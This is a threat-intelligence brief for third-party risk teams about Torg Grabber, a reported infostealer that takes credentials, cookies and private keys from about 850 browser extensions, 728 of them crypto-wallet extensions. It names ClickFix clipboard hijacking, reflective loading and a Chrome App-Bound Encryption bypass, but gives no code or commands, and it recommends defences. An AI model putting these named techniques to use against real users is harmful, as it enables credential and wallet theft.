Infostealer Malware Torg Grabber Harvests Data from 728 Crypto‑Wallet Browser Extensions
What Happened — Researchers at Gen Digital identified a new info‑stealer, Torg Grabber, that hijacks the clipboard (ClickFix technique) to run malicious PowerShell and then steals data from 850 browser extensions, including 728 cryptocurrency‑wallet extensions. The malware exfiltrates credentials, cookies, and private keys via HTTPS through Cloudflare‑fronted C2 servers.
Why It Matters for TPRM —
- Third‑party crypto‑wallet extensions are a high‑value attack surface for supply‑chain risk.
- The rapid evolution of C2 infrastructure (weekly new servers) shows a persistent threat that can affect any organization whose employees use these extensions.
- Anti‑analysis and in‑memory execution make detection difficult, increasing the likelihood of undetected data loss.
Who Is Affected — Financial services (crypto exchanges, custodians), SaaS platforms that integrate with wallet extensions, and any enterprise allowing browser‑based crypto transactions.
Recommended Actions —
- Review and restrict use of browser extensions for crypto wallets and password managers on corporate devices.
- Enforce application‑allow‑list policies and disable PowerShell execution for non‑admin users.
- Deploy endpoint detection that can monitor clipboard hijacking and reflective DLL injection.
Technical Notes — Initial access via ClickFix clipboard hijack → malicious PowerShell. Exfiltration uses encrypted HTTPS over Cloudflare. Malware employs direct syscalls, reflective loading, multi‑layer obfuscation, and App‑Bound Encryption bypass to steal Chrome/Edge/Brave/Opera cookies. Also uses a separate tool “Underground” to extract master encryption keys via COM Elevation Service. No public CVE; the threat is a custom, actively‑developed infostealer. Source: BleepingComputer